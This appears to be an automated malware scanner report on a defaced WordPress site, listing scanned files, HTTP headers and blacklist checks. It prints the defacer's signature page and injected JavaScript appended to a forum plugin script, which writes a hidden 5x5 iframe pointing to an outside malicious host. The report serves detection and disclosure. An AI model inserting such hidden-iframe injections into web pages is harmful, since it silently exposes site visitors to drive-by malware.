New scan:

Malware Scanner report for neweyecomputers.com

Malicious/Suspicious/Total urls checked
1/0/10
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/2/3
2 suspicious iframes found. See details below
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

Hacked By Rexal Scooterist  (30 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://neweyecomputers.com/
200 OK
Content-Length: 6305
Content-Type: text/html
suspicious
Deface/Content modification. The following signature was found: Hacked By Rexal Scooterist

<!--
Code by Rexal Scooterist
Contact : Rexal Scooterist@gmail.com
FB : Rexal Scooterist
Blog :
--!>
<!DOCTYPE HTML>
<html lang="en-US">
<head>
<meta name="keywords" content="Hacked By Rexal Scooterist">
<meta name="description" content="./~hack"><meta content=Hacked By Rexal Scooterist, Rexal Scooterist indonesian hacker,defacer'

name='keywords'/>
<meta content='Hacked By Rexal Scooterist' name='subject'/>
<meta content='Hacked By Rexal Scooterist' name='Abstract'/>
<meta content='Hacked By Rexal Scooterist' name='copyright'/>
<meta content='Hacked By
...[7066 bytes skipped]...


http://neweyecomputers.com/test404page.js
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 16 Jul 2015 00:40:05 GMT
Pragma: no-cache
Location: http://neweyecomputers.com/test404page.js/
Server: Apache/2.2.22
Vary: User-Agent,Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=e9c28dc05323e22a74d8524c459170ec; path=/
X-Pingback: http://neweyecomputers.com/xmlrpc.php
X-Powered-By: PHP/5.3.29
clean
http://neweyecomputers.com/test404page.js/
200 OK
Content-Length: 12598
Content-Type: text/html
clean
http://neweyecomputers.com/wp-includes/js/l10n.js?ver=20101110
200 OK
Content-Length: 307
Content-Type: application/javascript
clean
http://neweyecomputers.com/wp-includes/js/swfobject.js?ver=2.2
200 OK
Content-Length: 10219
Content-Type: application/javascript
clean
http://neweyecomputers.com/wp-includes/js/comment-reply.js?ver=20090102
200 OK
Content-Length: 785
Content-Type: application/javascript
clean
http://neweyecomputers.com/wp-includes/js/jquery/jquery.js?ver=1.4.4
200 OK
Content-Length: 78619
Content-Type: application/javascript
clean
http://neweyecomputers.com/wp-content/plugins/wpstorecart/php/wpsc-1.1/wpsc/wpsc-javascript.php?ver=1.3.2
200 OK
Content-Length: 0
Content-Type: text/html
clean
http://neweyecomputers.com/wp-content/plugins/forum-server/js/script.js
200 OK
Content-Length: 4549
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function quote(id){
var url = $F('url') + '/wp-content/plugins/forumserver/quote.php&id=' + id;
new Ajax.Updater('forumtext', url, {onComplete:function(){new Effect.ScrollTo('forumtext')} });
}

function surroundText(text1, text2, textarea)
{
if (typeof(textarea.caretPos) != "undefined" && textarea.createTextRange)
{
var caretPos = textarea.caretPos, temp_length = caretPos.text.length;

caretPos.text = caretPos.text.char
... 3976 bytes are skipped ...
mp; checkform[i].name.substr(0, mask.length) != mask))
continue;

if (!checkform[i].disabled)
checkform[i].checked = headerfield.checked;
}
}

function uncheckglobal(headerfield, checkform){
checkform.mod_global.checked = false;
}



;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');

Antivirus reports:

ESET-NOD32
HTML/Iframe.B.Gen

Hidden iFrame found.
size: 5x5     
src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8

<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">

http://neweyecomputers.com/wp-content/themes/traction/javascripts/traction.js
200 OK
Content-Length: 9327
Content-Type: application/javascript
suspicious
Hidden iFrame found.
size: 5x5     
src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8

<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: neweyecomputers.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Jul 2015 00:40:05 GMT
Accept-Ranges: bytes
ETag: "de6470c-18a1-50e31f7055a0b"
Server: Apache/2.2.22
Vary: Accept-Encoding,User-Agent
Content-Length: 6305
Content-Type: text/html
Last-Modified: Tue, 03 Feb 2015 16:57:24 GMT

...6305 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: neweyecomputers.com
Referer: http://www.google.com/search?q=neweyecomputers.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=neweyecomputers.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://neweyecomputers.com/

Result: neweyecomputers.com is not infected or malware details are not published yet.